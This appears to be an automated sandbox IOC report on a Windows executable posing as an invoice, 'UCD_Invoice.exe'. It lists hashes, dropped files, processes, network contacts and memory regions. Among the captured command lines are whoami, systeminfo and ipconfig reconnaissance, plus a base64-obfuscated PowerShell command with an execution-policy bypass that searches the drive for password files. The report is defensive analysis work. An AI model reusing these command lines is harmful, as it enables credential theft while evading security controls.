Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

UCD_Invoice.exe

PE32 executable (console) Intel 80386, for MS Windows

initial sample

Details

Filetype:	PE32 executable (console) Intel 80386, for MS Windows
Entropy:	5.858773430378765
Filename:	UCD_Invoice.exe
Filesize:	477696
MD5:	54141e908422dcbafbb2a393087b302c
SHA1:	cbb743e5f146a92d98908cb75bde70bfe80a700f
SHA256:	5d08c6a730a09e0f024a07ecea931cb8fe942b8c063edd896c636fc42454e494
SHA512:	dcf2a4fa8f5a59ac14a395772b2054971a22a2b4c2f3435cc36516a81bc0ac837a34913e5d7f9427df23df0758ed30acdeeb4172044552e9f2a65ac2fd1be6fa
SSDEEP:	12288:tJca/ycIroiCwjENvxfBNf12kMC3ZbX9:3/XNvxJ7MIX
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........WT..9...9...9...:...9...<.#.9...=...9..k....9...<...9...=...9...:...9...8...9...8...9..=...9..;...9.Rich..9................

Signature Hits	Behavior Group	Mitre Attack
Sample has a suspicious name (potential lure to open the executable)	System Summary	Masquerading
Suspicious command line found	Data Obfuscation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)	Malware Analysis System Evasion
Uses ipconfig to lookup or modify the Windows network settings	Persistence and Installation Behavior	System Network Configuration Discovery
Uses whoami command line tool to query computer and username	Boot Survival
AV process strings found (often used to terminate AV products)	Lowering of HIPS / PFW / Operating System Security Settings
Contains functionality to check if a debugger is running (IsDebuggerPresent)	Anti Debugging
Contains functionality to query CPU information (cpuid)	Language, Device and Operating System Detection	System Information Discovery
Contains functionality to query locales information (e.g. system language)	Language, Device and Operating System Detection
Contains functionality to read the PEB	Anti Debugging
Contains functionality which may be used to detect a debugger (GetProcessHeap)	Anti Debugging
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion
Detected potential crypto function	System Summary	Process Discovery Archive Collected Data Encrypted Channel
Found potential string decryption / allocating functions	System Summary	Deobfuscate/Decode Files or Information Obfuscated Files or Information
May sleep (evasive loops) to hinder dynamic analysis	Malware Analysis System Evasion	File and Directory Discovery
PE file contains sections with non-standard names	Data Obfuscation
Tries to load missing DLLs	System Summary	DLL Side-Loading
Uses 32bit PE files	Compliance, System Summary	Masquerading
Uses Microsoft's Enhanced Cryptographic Provider	Cryptography
Uses code obfuscation techniques (call, push, ret)	Data Obfuscation
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Contains functionality to enum processes or threads	System Summary	Process Discovery
Contains functionality to enumerate / list files inside a directory	Spreading, Malware Analysis System Evasion	File and Directory Discovery
Contains functionality to query local / system time	Language, Device and Operating System Detection	System Time Discovery
Contains functionality to register its own exception handler	Anti Debugging
Creates temporary files	System Summary
PE file has an executable .text section and no other executable section	System Summary
Queries a list of all running processes	Malware Analysis System Evasion
Reads software policies	System Summary
Uses systeminfo.exe to query system information	System Summary
PE file contains a debug data directory	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a mix of data directories often seen in goodware	System Summary

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Category:	dropped
Dump:	ModuleAnalysisCache.7.dr
ID:	dr_4
Target ID:	7
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	4.838950934453595
Encrypted:	false
Ssdeep:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
Size:	8003
Whitelisted:	false
Reputation:	moderate

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.7.dr
ID:	dr_5
Target ID:	7
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	5.411938461649593
Encrypted:	false
Ssdeep:	24:3K1yt4WSKco4KmZjKbmOIld6emZ9tYs4RPQoUEJ0gt/NK3R8UHiagfBw:sy+WSU4xym/jmZ9tz4RIoUl8NWR8WGBw
Size:	1328
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdinczqy.e1y.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdinczqy.e1y.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_fdinczqy.e1y.psm1.7.dr
ID:	dr_3
Target ID:	7
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oitnmm4g.wju.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oitnmm4g.wju.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_oitnmm4g.wju.ps1.7.dr
ID:	dr_2
Target ID:	7
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\ucd_info.svg

ASCII text, with CRLF line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\ucd_info.svg
Category:	dropped
Dump:	ucd_info.svg.0.dr
ID:	dr_1
Target ID:	0
Process:	C:\Users\user\Desktop\UCD_Invoice.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	4.654611328600752
Encrypted:	false
Ssdeep:	96:PjuDyC2+88/vdQeng+Uq18C36xAzWaAfcF:vC2+8EvJngcpzb
Size:	3416
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

\Device\ConDrv

ASCII text, with CRLF line terminators

dropped

Details

File:	\Device\ConDrv
Category:	dropped
Dump:	ConDrv.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Users\user\Desktop\UCD_Invoice.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	4.637958447710886
Encrypted:	false
Ssdeep:	12:1wRylF3RFQSA5+fo5ybe9lJw9JvFgfZL0eMAV:iiF/A5+f9bedw9hufZL0eMAV
Size:	403
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\UCD_Invoice.exe

"C:\Users\user\Desktop\UCD_Invoice.exe"

Details

Is windows:	false
Is dropped:	false
PID:	7292
Target ID:	0
Parent PID:	2580
Name:	UCD_Invoice.exe
Path:	C:\Users\user\Desktop\UCD_Invoice.exe
Commandline:	"C:\Users\user\Desktop\UCD_Invoice.exe"
Size:	477696
MD5:	54141E908422DCBAFBB2A393087B302C
Time:	13:34:17
Date:	28/03/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x800000
Modulesize:	503808
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Initial sample is a PE file and has a suspicious name	System Summary
Sample has a suspicious name (potential lure to open the executable)	System Summary
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)	Malware Analysis System Evasion	Security Software Discovery
PE file contains sections with non-standard names	Data Obfuscation
Uses 32bit PE files	Compliance, System Summary
PE file has an executable .text section and no other executable section	System Summary
Sigma detected: Local Accounts Discovery	System Summary
Sigma detected: Suspicious Network Command	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary
PE file contains a debug data directory	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a mix of data directories often seen in goodware	System Summary

C:\Windows\SysWOW64\whoami.exe

whoami

Details

Is windows:	true
Is dropped:	false
PID:	7344
Target ID:	2
Parent PID:	7292
Name:	whoami.exe
Path:	C:\Windows\SysWOW64\whoami.exe
Commandline:	whoami
Size:	58880
MD5:	801D9A1C1108360B84E60A457D5A773A
Time:	13:34:18
Date:	28/03/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x170000
Modulesize:	69632
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Uses whoami command line tool to query computer and username	Boot Survival	System Information Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Local Accounts Discovery	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

Details

Is windows:	true
Is dropped:	false
PID:	7360
Target ID:	3
Parent PID:	7292
Name:	systeminfo.exe
Path:	C:\Windows\SysWOW64\systeminfo.exe
Commandline:	systeminfo
Size:	76800
MD5:	36CCB1FFAFD651F64A22B5DA0A1EA5C5
Time:	13:34:18
Date:	28/03/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xc80000
Modulesize:	94208
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection
Uses systeminfo.exe to query system information	System Summary	System Information Discovery

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /all

Details

Is windows:	true
Is dropped:	false
PID:	7472
Target ID:	5
Parent PID:	7292
Name:	ipconfig.exe
Class:	system-tools
Path:	C:\Windows\SysWOW64\ipconfig.exe
Commandline:	ipconfig /all
Size:	29184
MD5:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Time:	13:34:18
Date:	28/03/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x4b0000
Modulesize:	45056
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Uses ipconfig to lookup or modify the Windows network settings	Persistence and Installation Behavior	System Network Configuration Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Network Command	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))"

Details

Is windows:	true
Is dropped:	false
PID:	7520
Target ID:	6
Parent PID:	7292
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	13:34:19
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x240000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious command line found	Data Obfuscation	Command and Scripting Interpreter
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))"

Details

Is windows:	true
Is dropped:	false
PID:	7536
Target ID:	7
Parent PID:	7520
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))"
Size:	433152
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Time:	13:34:19
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x900000
Modulesize:	446464
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Yara detected AntiVM3	Malware Analysis System Evasion
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious command line found	Data Obfuscation	Command and Scripting Interpreter
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7300
Target ID:	1
Parent PID:	7292
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	13:34:17
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\wbem\WmiPrvSE.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

Details

Is windows:	true
Is dropped:	false
PID:	7388
Target ID:	4
Parent PID:	752
Name:	WmiPrvSE.exe
Path:	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
Commandline:	C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Size:	418304
MD5:	64ACA4F48771A5BA50CD50F2410632AD
Time:	13:34:18
Date:	28/03/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	false
Is elevated:	true
Modulebase:	0x150000
Modulesize:	434176
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://pesterbdd.com/images/Pester.png

unknown

http://nuget.org/NuGet.exe

unknown

https://aka.ms/pscore6lB

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

http://example.com/

93.184.216.34

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

http://www.evilcorp.com

unknown

https://www.iana.org/domains/example

unknown

http://pesterbdd.com/i

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://github.com/Pester/Pester

unknown

There are 4 hidden URLs, click here to show them.

Domains

Name

Malicious

example.com

93.184.216.34

Details

Name:	example.com
IP:	93.184.216.34
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

93.184.216.34

example.com

European Union

Registry

Path

Value

Malicious

HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB

@%SystemRoot%\system32\mlang.dll,-4387

HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB

@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address

Regiontype

Protect

Malicious

1010000

heap

page read and write

7BD0000

trusted library allocation

page read and write

4B74000

trusted library allocation

page read and write

331E000

stack

page read and write

571000

heap

page read and write

140E000

stack

page read and write

78B3000

heap

page read and write

3540000

trusted library allocation

page read and write

807000

unkown

page execute read

579000

heap

page read and write

794D000

heap

page read and write

3060000

heap

page read and write

78AB000

heap

page read and write

DF0000

heap

page read and write

7430000

heap

page read and write

585000

heap

page read and write

7890000

heap

page read and write

11D1000

heap

page read and write

70E0000

heap

page execute and read and write

FBD000

stack

page read and write

4C80000

heap

page execute and read and write

870E000

stack

page read and write

86D000

unkown

page write copy

1022000

heap

page read and write

4D51000

trusted library allocation

page read and write

1DE000

stack

page read and write

5D59000

trusted library allocation

page read and write

1019000

heap

page read and write

7B0D000

stack

page read and write

DF4000

heap

page read and write

1011000

heap

page read and write

FDE000

heap

page read and write

587000

heap

page read and write

F7D000

stack

page read and write

1023000

heap

page read and write

1005000

heap

page read and write

3430000

heap

page read and write

4EA6000

trusted library allocation

page read and write

100D000

heap

page read and write

755E000

stack

page read and write

4B73000

trusted library allocation

page execute and read and write

70DE000

stack

page read and write

550000

heap

page read and write

57E000

heap

page read and write

7955000

heap

page read and write

1025000

heap

page read and write

312D000

heap

page read and write

87F0000

heap

page read and write

571000

heap

page read and write

1B0E000

stack

page read and write

31E0000

heap

page read and write

712E000

stack

page read and write

75DE000

stack

page read and write

593000

heap

page read and write

7CF000

stack

page read and write

52F000

stack

page read and write

357E000

stack

page read and write

101D000

heap

page read and write

3440000

heap

page read and write

801000

unkown

page execute read

806000

heap

page read and write

4D20000

trusted library allocation

page read and write

323C000

stack

page read and write

7968000

heap

page read and write

176F000

stack

page read and write

11E0000

heap

page read and write

11D1000

heap

page read and write

7BB0000

trusted library allocation

page read and write

57E000

heap

page read and write

5A1000

heap

page read and write

4BA2000

trusted library allocation

page read and write

DF4000

heap

page read and write

3270000

heap

page read and write

1012000

heap

page read and write

79B0000

trusted library allocation

page read and write

100D000

heap

page read and write

7909000

heap

page read and write

1008000

heap

page read and write

56D000

heap

page read and write

578000

heap

page read and write

593000

heap

page read and write

78E000

stack

page read and write

102C000

heap

page read and write

773E000

stack

page read and write

5DBD000

trusted library allocation

page read and write

11D1000

heap

page read and write

4B89000

trusted library allocation

page read and write

7A00000

trusted library allocation

page read and write

11D1000

heap

page read and write

4D40000

heap

page read and write

C1F000

stack

page read and write

716E000

stack

page read and write

3448000

heap

page read and write

4BA0000

trusted library allocation

page read and write

8650000

trusted library allocation

page execute and read and write

1C0F000

stack

page read and write

4B70000

trusted library allocation

page read and write

558000

heap

page read and write

7762000

heap

page read and write

335E000

stack

page read and write

56D000

heap

page read and write

1460000

heap

page read and write

57E000

heap

page read and write

5D51000

trusted library allocation

page read and write

2D9C000

stack

page read and write

338D000

stack

page read and write

8720000

trusted library allocation

page read and write

76FE000

stack

page read and write

100D000

heap

page read and write

4B7D000

trusted library allocation

page execute and read and write

78F7000

heap

page read and write

57E000

heap

page read and write

1022000

heap

page read and write

2FCC000

stack

page read and write

7ACE000

stack

page read and write

800000

unkown

page readonly

801000

unkown

page execute read

F40000

trusted library allocation

page read and write

5A1000

heap

page read and write

4E0000

heap

page read and write

DF4000

heap

page read and write

11D1000

heap

page read and write

71EE000

stack

page read and write

1010000

heap

page read and write

1019000

heap

page read and write

11D1000

heap

page read and write

72BD000

stack

page read and write

7870000

trusted library allocation

page read and write

4BA5000

trusted library allocation

page execute and read and write

72FB000

stack

page read and write

341E000

stack

page read and write

597000

heap

page read and write

7935000

heap

page read and write

101A000

heap

page read and write

861000

unkown

page readonly

DF4000

heap

page read and write

57E000

heap

page read and write

DF4000

heap

page read and write

1006000

heap

page read and write

DF4000

heap

page read and write

722F000

stack

page read and write

4D0E000

stack

page read and write

733E000

stack

page read and write

FFF000

heap

page read and write

7A4E000

stack

page read and write

88A0000

heap

page read and write

31DE000

stack

page read and write

11D1000

heap

page read and write

DF4000

heap

page read and write

540A000

trusted library allocation

page read and write

4C6A000

trusted library allocation

page read and write

1000000

heap

page read and write

94D000

stack

page read and write

76BE000

stack

page read and write

33DE000

stack

page read and write

7914000

heap

page read and write

11D1000

heap

page read and write

1000000

heap

page read and write

DF4000

heap

page read and write

DF4000

heap

page read and write

70E000

stack

page read and write

70E5000

heap

page execute and read and write

3558000

heap

page read and write

FDA000

heap

page read and write

DF4000

heap

page read and write

DF4000

heap

page read and write

7B70000

trusted library allocation

page read and write

DF4000

heap

page read and write

8730000

trusted library allocation

page execute and read and write

2DD7000

stack

page read and write

800000

heap

page read and write

587000

heap

page read and write

EC000

stack

page read and write

7860000

heap

page execute and read and write

7B20000

trusted library allocation

page execute and read and write

3050000

heap

page read and write

7420000

heap

page read and write

767E000

stack

page read and write

3068000

heap

page read and write

1019000

heap

page read and write

7A09000

trusted library allocation

page read and write

3200000

heap

page read and write

7901000

heap

page read and write

11D1000

heap

page read and write

319E000

stack

page read and write

1010000

heap

page read and write

156D000

stack

page read and write

4C68000

trusted library allocation

page read and write

86D000

unkown

page read and write

4CCC000

stack

page read and write

59A000

heap

page read and write

4BC0000

trusted library allocation

page read and write

4B80000

trusted library allocation

page read and write

1E0000

heap

page read and write

100D000

heap

page read and write

DF4000

heap

page read and write

871000

unkown

page readonly

5080000

heap

page read and write

9B0000

heap

page read and write

599000

heap

page read and write

3500000

heap

page read and write

587000

heap

page read and write

79F5000

trusted library allocation

page read and write

597000

heap

page read and write

DF4000

heap

page read and write

759B000

stack

page read and write

1008000

heap

page read and write

7B50000

trusted library allocation

page read and write

5416000

trusted library allocation

page read and write

30D2000

heap

page read and write

871000

unkown

page readonly

7B30000

trusted library allocation

page read and write

DF4000

heap

page read and write

11D1000

heap

page read and write

1010000

heap

page read and write

1022000

heap

page read and write

4E5000

heap

page read and write

7946000

heap

page read and write

597000

heap

page read and write

DF4000

heap

page read and write

7A8E000

stack

page read and write

7B40000

trusted library allocation

page read and write

7BF0000

trusted library allocation

page read and write

73BE000

stack

page read and write

86CD000

stack

page read and write

7BC0000

trusted library allocation

page read and write

DF4000

heap

page read and write

579000

heap

page read and write

DF4000

heap

page read and write

11D1000

heap

page read and write

1770000

remote allocation

page read and write

873000

unkown

page readonly

100D000

heap

page read and write

79A6000

trusted library allocation

page read and write

873000

unkown

page readonly

101D000

heap

page read and write

5A1000

heap

page read and write

CFD000

stack

page read and write

FD0000

heap

page read and write

13CD000

stack

page read and write

73FA000

stack

page read and write

587000

heap

page read and write

74F000

stack

page read and write

59D000

heap

page read and write

1008000

heap

page read and write

8770000

trusted library allocation

page read and write

FF3000

heap

page read and write

3390000

heap

page read and write

1770000

remote allocation

page read and write

308C000

heap

page read and write

861000

unkown

page readonly

4DAB000

trusted library allocation

page read and write

7B90000

trusted library allocation

page read and write

C20000

heap

page read and write

793D000

heap

page read and write

593000

heap

page read and write

1005000

heap

page read and write

101D000

heap

page read and write

1019000

heap

page read and write

7B80000

trusted library allocation

page read and write

7990000

trusted library allocation

page read and write

7B10000

trusted library allocation

page read and write

3098000

heap

page read and write

4C0E000

stack

page read and write

4C50000

heap

page readonly

78EF000

heap

page read and write

DF4000

heap

page read and write

12C000

stack

page read and write

3420000

heap

page read and write

761E000

stack

page read and write

800000

unkown

page readonly

8710000

heap

page read and write

68E000

stack

page read and write

144E000

stack

page read and write

71AE000

stack

page read and write

4D10000

trusted library allocation

page execute and read and write

4D47000

heap

page read and write

7BE0000

trusted library allocation

page read and write

190000

heap

page read and write

DF4000

heap

page read and write

9A0000

heap

page read and write

1770000

remote allocation

page read and write

7912000

heap

page read and write

DF4000

heap

page read and write

4D30000

heap

page read and write

8660000

trusted library allocation

page read and write

56E000

heap

page read and write

1010000

heap

page read and write

BDE000

stack

page read and write

11D1000

heap

page read and write

DD0000

heap

page read and write

1000000

heap

page read and write

3550000

heap

page read and write

4C4E000

stack

page read and write

590000

heap

page read and write

6CE000

stack

page read and write

DF4000

heap

page read and write

166F000

stack

page read and write

587000

heap

page read and write

592000

heap

page read and write

102D000

heap

page read and write

7C40000

heap

page read and write

FF0000

heap

page read and write

5D79000

trusted library allocation

page read and write

7B60000

trusted library allocation

page read and write

7BA0000

trusted library allocation

page read and write

3206000

heap

page read and write

DF4000

heap

page read and write

587000

heap

page read and write

807000

unkown

page execute read

737E000

stack

page read and write

79A0000

trusted library allocation

page read and write

3102000

heap

page read and write

11D0000

heap

page read and write

C40000

heap

page read and write

There are 305 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
UCD_Invoice.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportUCD_Invoice.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
UCD_Invoice.exe